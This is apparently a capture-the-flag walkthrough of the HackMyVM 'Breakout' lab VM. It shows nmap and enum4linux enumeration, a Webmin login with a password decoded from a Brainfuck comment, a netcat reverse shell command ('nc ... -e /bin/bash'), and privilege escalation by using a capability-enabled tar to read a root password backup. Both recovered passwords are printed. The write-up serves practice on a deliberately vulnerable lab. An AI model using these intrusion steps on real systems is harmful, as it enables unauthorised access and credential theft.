HackMyVm Breakout Walkthrough
Key points: good enum
https://hackmyvm.eu/machines/machine.php?vm=Breakout
Scan ports.
~ nmap -sV -sC -p- -Pn 192.168.33.145 -oN ports.log
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST
Nmap scan report for 192.168.33.145
Host is up (0.0022s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-22T22:03:10
|_ start_date: N/A Check source code of index.html at port 80.
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->It's brainfuck code. Decode it online, get string `".2uqPEfj3D<P'a-3"`.
Use enum4linux to enum.
```bash
~ enum4linux 192.168.33.145 | tee enum.log
...
S-1-22-1-1000 Unix User\cyber (Local User)
With username cyber and password we decode from brainfuck code, we can login at port 20000.
In control panel, we found command shell.
image-20211022224903817.png
Run "nc 192.168.33.128 1234 -e /bin/bash", we can get reverse shell.
```bash
~ nc -nlvp 1234 fish-0 | 0 [22:47:24]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.145.
Ncat: Connection from 192.168.33.145:35206.
id
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
python3 -c 'import pty;pty.spawn("/bin/bash")'
cyber@breakout:~$Search cap.
```bash
cyber@breakout:/$ getcap / -r 2>/dev/null
getcap / -r 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
And we found password backup.
```bash
cyber@breakout:/tmp$ ls -la /var/backups
ls -la /var/backups
total 12
drwxr-xr-x 2 root root 4096 Oct 20 07:49 .
drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
-rw------- 1 root root 17 Oct 20 07:49 .old_pass.bakWe can compress it can extract it in /tmp folder using /home/cyber/tar.
cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
/home/cyber/tar -cvf pass.tar /var/backups
/home/cyber/tar: Removing leading `/' from member names
/var/backups/
/var/backups/.old_pass.bak
cyber@breakout:/tmp$ tar -xvf pass.tar
tar -xvf pass.tar
var/backups/
var/backups/.old_pass.bak
cyber@breakout:/tmp$ cd var/backups
cd var/backups
cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~hFinally we get root.
```bash
root@breakout:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
breakout